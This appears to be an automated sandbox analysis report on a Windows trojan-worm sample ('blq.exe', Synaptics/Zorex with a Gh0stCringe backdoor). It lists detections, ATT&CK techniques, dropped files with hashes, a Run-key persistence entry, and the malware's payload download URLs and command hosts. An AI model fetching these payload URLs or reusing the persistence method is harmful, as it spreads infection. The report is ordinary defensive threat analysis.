Source: Yara match | File source: 0.3.blq.exe.748e74.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.blq.exe.748e74.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.blq.exe.4b8e14.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.0.blq.exe.4b8e14.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.1659507821.0000000000403000.00000008.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1660121834.0000000000716000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ._cache_blq.exe PID: 7616, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\Desktop\._cache_blq.exe, type: DROPPED
Source: Yara match | File source: blq.exe, type: SAMPLE
Source: Yara match | File source: 0.0.blq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000000.1654706564.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: blq.exe PID: 7560, type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Source: Yara match | File source: C:\ProgramData\Synaptics\RCXAFD2.tmp, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 41 Scripting | 1 Valid Accounts | 11 Native API | 41 Scripting | 1 DLL Side-Loading | 1 Obfuscated Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | 1 Replication Through Removable Media | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Valid Accounts | 1 Timestomp | LSASS Memory | 1 Peripheral Device Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 12 Service Execution | 1 Valid Accounts | 1 Access Token Manipulation | 1 DLL Side-Loading | Security Account Manager | 3 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | 22 Windows Service | 22 Windows Service | 1 File Deletion | NTDS | 35 System Information Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 12 Process Injection | 142 Masquerading | LSA Secrets | 1 Query Registry | SSH | Keylogging | 34 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Registry Run Keys / Startup Folder | 1 Valid Accounts | Cached Domain Credentials | 151 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Access Token Manipulation | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 31 Virtualization/Sandbox Evasion | Proc Filesystem | 12 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 12 Process Injection | /etc/passwd and /etc/shadow | 11 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Indicator Removal | Network Sniffing | 1 Remote System Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 System Network Configuration Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
[Behavior graph] Behavior Graph ID: 1580529, Sample: blq.exe, Start date: 24/12/2024, Architecture: WINDOWS, Score: 100

Source | Detection | Scanner | Label | Link
blq.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
blq.exe | 100% | Avira | TR/AD.Farfli.qqkhu |
blq.exe | 100% | Avira | TR/Dldr.Agent.SH |
blq.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
blq.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\Desktop\._cache_blq.exe | 100% | Avira | TR/AD.Farfli.qqkhu |
C:\ProgramData\Synaptics\RCXAFD2.tmp | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\RCXAFD2.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Program Files (x86)\6795234.dll | 100% | Avira | BDS/Backdoor.Gen7 |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/AD.Farfli.qqkhu |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH |
C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006 |
C:\ProgramData\Synaptics\RCXAFD2.tmp | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\6795234.dll | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML | |
C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | 100% | Joe Sandbox ML | |
C:\ProgramData\Synaptics\RCXAFD2.tmp | 100% | ReversingLabs | Win32.Worm.Zorex |
C:\ProgramData\Synaptics\Synaptics.exe | 92% | ReversingLabs | Win32.Trojan.Synaptics |
C:\Users\user\Documents\DTBZGIOOSO\~$cache1 | 100% | ReversingLabs | Win32.Worm.Zorex |
C:\Windows\SysWOW64\encvbk.exe | 0% | ReversingLabs | |
                          No Antivirus matches
                          No Antivirus matches
Source | Detection | Scanner | Label | Link
http://xred.site50.net/syn/SUpdate.iniH)) | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/SUpdate.ini | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/Synaptics.rar | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/SSLLibrary.dlp | 100% | Avira URL Cloud | malware |
http://xred.site50.net/syn/SSLLibrary.dll | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.181.14 | true | false | | high
drive.usercontent.google.com | 142.250.181.1 | true | false | | high
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
xred.mooo.com | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://docs.google.com/: | Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1 | blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1 | blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1 | blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, ~DF601ED631F8CE1B03.TMP.5.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978~ | Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.google.com/x | Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8 | blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SUpdate.ini | blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | true | Avira URL Cloud: malware | unknown
http://xred.site50.net/syn/SSLLibrary.dlp | blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://xred.site50.net/syn/SUpdate.iniH)) | blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978R | Synaptics.exe, 00000003.00000002.2938078109.000000000081B000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://docs.google.com/l | Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/ | Synaptics.exe, 00000003.00000002.2940590142.0000000005511000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/Synaptics.rar | blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | true | Avira URL Cloud: malware | unknown
https://docs.google.com/uc?id=0; | Synaptics.exe, 00000003.00000002.2973653259.000000001553E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2964528186.000000001047E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2956086425.000000000D87E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2976837212.00000000180FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.3028509920.000000002B33E000.00000004.00000010.00020000.00000000.sdmp | false | | high
https://docs.google.com/d | Synaptics.exe, 00000003.00000002.2946052719.0000000007707000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://xred.site50.net/syn/SSLLibrary.dll | blq.exe, 00000000.00000003.1660094659.000000000072B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, Synaptics.exe, 00000003.00000002.2938602891.0000000002080000.00000004.00001000.00020000.00000000.sdmp, RCXAFD2.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.dr | true | Avira URL Cloud: malware | unknown
https://docs.google.com/ | Synaptics.exe, 00000003.00000002.2998989997.000000001DE22000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.000000000082B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2938078109.0000000000871000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl | blq.exe, 00000000.00000003.1661544284.0000000002290000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
142.250.181.1 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
103.36.221.195 | unknown | China | | 4808 | CHINA169-BJChinaUnicomBeijingProvinceNetworkCN | true
142.250.181.14 | docs.google.com | United States | | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | | 17048 | AWKNET-LLCUS | false
                                                                    IP
                                                                    127.0.0.1
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1580529
                                                                    Start date and time:2024-12-24 22:10:10 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 9m 45s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:25
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:blq.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.bank.troj.expl.evad.winEXE@36/50@17/5
                                                                    EGA Information:
                                                                    • Successful, ratio: 75%
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 22
                                                                    • Number of non-executed functions: 82
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 23.218.208.109, 52.113.194.132, 20.189.173.23, 20.42.73.29, 20.189.173.21, 20.231.128.66, 20.109.210.53, 13.107.246.63
                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, onedsblobprdeus15.eastus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, onedscolprdwus16.westus.cloudapp.azure.com, europe.configsvc1.live.com.akadns.net
                                                                    • Execution Graph export aborted for target Synaptics.exe, PID 7644 because there are no executed function
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                    • VT rate limit hit for: blq.exe
Time | Type | Description
16:11:03 | API Interceptor | 6808614x Sleep call for process: svchost.exe modified
16:11:05 | API Interceptor | 668x Sleep call for process: Synaptics.exe modified
16:11:44 | API Interceptor | 1430x Sleep call for process: encvbk.exe modified
16:12:40 | API Interceptor | 2x Sleep call for process: WerFault.exe modified
16:13:03 | API Interceptor | 2131280x Sleep call for process: splwow64.exe modified
21:11:04 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Process:C:\Users\user\Desktop\._cache_blq.exe
                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):26112
                                                                                        Entropy (8bit):6.076389673115769
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:8T9IWqIwt10zr6lXYhCRdkyurLmC2S1xJrQcWrH/RUAMO0MY0holUxHdAq4tKDES:8ht+Izr6pqRrLuS1vzWpaGZHd8YDG
                                                                                        MD5:0A9A34B7B8BE7680123DC29107A3EAAC
                                                                                        SHA1:883F19EFCEA8184B9D01E5AAE9455DE0B64D71EB
                                                                                        SHA-256:C105D6B7304A43BFACF713B09C01E213047AC1E9123C1723E0164CF644CB0F37
                                                                                        SHA-512:6002AB855D8C96A43D9880DE14A09E4E96D51336B4D0203A1D9470AC9FF1CF4A56FAF15C6FE62FFFC4B52970D4788EB341125D90641365F89CD6780FDAE3AB08
                                                                                        Malicious:true
                                                                                        Yara Hits:
                                                                                        • Rule: JoeSecurity_Gh0stCringe, Description: Yara detected Gh0stCringe, Source: C:\Program Files (x86)\6795234.dll, Author: Joe Security
                                                                                        • Rule: MALWARE_Win_RunningRAT, Description: Detects RunningRAT, Source: C:\Program Files (x86)\6795234.dll, Author: ditekSHen
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):118
                                                                                        Entropy (8bit):3.5700810731231707
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                        MD5:573220372DA4ED487441611079B623CD
                                                                                        SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                        SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                        SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                        Malicious:false
                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):8192
                                                                                        Entropy (8bit):0.363788168458258
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                                                        MD5:0E72F896C84F1457C62C0E20338FAC0D
                                                                                        SHA1:9C071CC3D15E5BD8BF603391AE447202BD9F8537
                                                                                        SHA-256:686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
                                                                                        SHA-512:AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):1.3107547669861672
                                                                                        Encrypted:false
                                                                                        SSDEEP:3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrx:KooCEYhgYEL0In
                                                                                        MD5:3AB8271F73D8DCB35D78E24EFA2BAACA
                                                                                        SHA1:9225F2941072A7EAE1291D56F6675C4A9180248B
                                                                                        SHA-256:ABC032062728A1F935FEA983B9E5AD51B18A0A361B8EB7F0F4AF8B4F729291F9
                                                                                        SHA-512:B31ECCF5302AA088DF4ABDFEEB79E00E92C6800608594993B18269226E0DBEAE88B5958CF589863C4689A95937E9A5D482112E2435BAD2399C695692B497C593
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:Extensible storage engine DataBase, version 0x620, checksum 0x69339439, page size 16384, Windows version 10.0
                                                                                        Category:dropped
                                                                                        Size (bytes):1310720
                                                                                        Entropy (8bit):0.42225507562415393
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:vSB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:vazag03A2UrzJDO
                                                                                        MD5:809910E6B8E703423CCBAC33B3B160E5
                                                                                        SHA1:B9BDE61AC0D82B23C513BA5250BB4B8362DBB0C6
                                                                                        SHA-256:93DCB8D8EF20258EAE03EE28A0C7CD85770A55C0944E04C097B4C4826EBCA818
                                                                                        SHA-512:A7D7CA4FC4C8A62FE9FE2CE39995BDB7A1248EE75D7BE7DAFC368735FA8D232E5BC28F5FFF717490B1B74BB928D8C0AD43B4AC96C3D6B0CFFAEFC407FEA4DCC0
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\System32\svchost.exe
                                                                                        File Type:data
                                                                                        Category:dropped
                                                                                        Size (bytes):16384
                                                                                        Entropy (8bit):0.07888274310497298
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:v/lUetYeW13u0038r//lht8rSwLZ8rfUCr//lJGQrwt8r//lallOE/tlnl+/rTc:vtNzCp0Mj/TO/ObZj/JZj/ApMP
                                                                                        MD5:9E050391C1080C153966B8728C811CD2
                                                                                        SHA1:975A4F0CA105EBE88CE906747A1191D40825858C
                                                                                        SHA-256:DE069E5827D7ED1A473DEFB0CBA24F3F294B86F318D3817632CDB957DC4B3D9C
                                                                                        SHA-512:ADBC266A9D08FECA88BE9DCFABCFF8EED90F1A99D6F4A3AA654AC036785FFECF4170392826F494684520DE3B511BB978EB0BB013A1648CBDDC7A6B3CED2B6503
                                                                                        Malicious:false
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.1336335933354542
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:wExnVpsl7tImV02k6PRDzJDzqjLOA2gFmOVzuiF5Z24IO8EKDzy:Vy5ts2k6PRJqjcqzuiF5Y4IO8zy
                                                                                        MD5:047AADF7F34C58E1C2EB207B55A7D43E
                                                                                        SHA1:40B8468BD748326529DF0614E84C7371F6D29017
                                                                                        SHA-256:A3DBB978FB5FD62DA123BDBEE07B79FEA0DBFCBFA08BB3C76F7601CD56EDACD9
                                                                                        SHA-512:8EB0780F0425CBBE12C7CE45E5915A716F19E5F132BFB6080292A49E106FDA8C19B5085DEF32526EC5CBCA21B6A654911FE41B32A1DE448851CBE6FE718D3DD0
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.4.8.3.3.7.1.3.8.0.3.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.4.8.3.5.5.7.6.3.0.3.8.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.d.9.f.6.a.-.d.7.4.8.-.4.f.f.9.-.a.b.f.c.-.b.2.f.6.d.9.6.f.2.a.9.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.0.4.6.e.3.5.b.-.c.1.5.a.-.4.f.6.4.-.8.0.d.7.-.8.6.8.6.f.e.2.f.b.3.1.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.c.-.0.0.0.1.-.0.0.1.4.-.a.f.f.d.-.f.8.5.4.4.8.5.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.2.4.c.7.6.9.4.e.6.c.f.1.7.6.3.c.1.a.9.8.b.d.1.a.2.7.1.5.2.b.e.d.1.e.b.f.f.8.2.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):65536
                                                                                        Entropy (8bit):1.1338552686139183
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:1RnVpsU7tI40Kks/kDzJDzqjLOA2gFmOVzuiF5Z24IO8EKDzy2:pyYtWKksMJqjcqzuiF5Y4IO8zy
                                                                                        MD5:9201EF94BC4D23FBC60FE4BEBCAEB64B
                                                                                        SHA1:1702FBAAA4B760075C326494EFDB38CEB80839A7
                                                                                        SHA-256:9C087166F83F8958B237BC9C8B8B95172D7B8A663D3AD384681231D588A6C278
                                                                                        SHA-512:3B9FAC6A787275CFA8AF9631E9BAEDB9A181817B478F08EB3E982F71F9DF3453B2D1C36CCA57D649D041C788235F655B5F374BD96E496A72E33E2A8A9FB93F09
                                                                                        Malicious:false
                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.5.4.8.3.6.0.8.0.7.2.6.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.5.4.8.3.8.5.1.1.9.7.6.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.e.f.b.2.d.7.-.f.f.b.f.-.4.2.0.7.-.a.d.c.b.-.3.5.3.f.e.e.3.c.a.c.9.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.e.8.1.e.e.7.-.4.8.d.d.-.4.8.9.1.-.9.3.7.a.-.2.e.2.9.f.8.a.f.a.2.9.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.c.-.0.0.0.1.-.0.0.1.4.-.a.f.f.d.-.f.8.5.4.4.8.5.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.f.2.4.c.7.6.9.4.e.6.c.f.1.7.6.3.c.1.a.9.8.b.d.1.a.2.7.1.5.2.b.e.d.1.e.b.f.f.8.2.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):6322
                                                                                        Entropy (8bit):3.7218065466196264
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:R6l7wVeJExa6GBCYiStl5QtprO89bdfsfg/m:R6lXJ16lYll5Q3dEfF
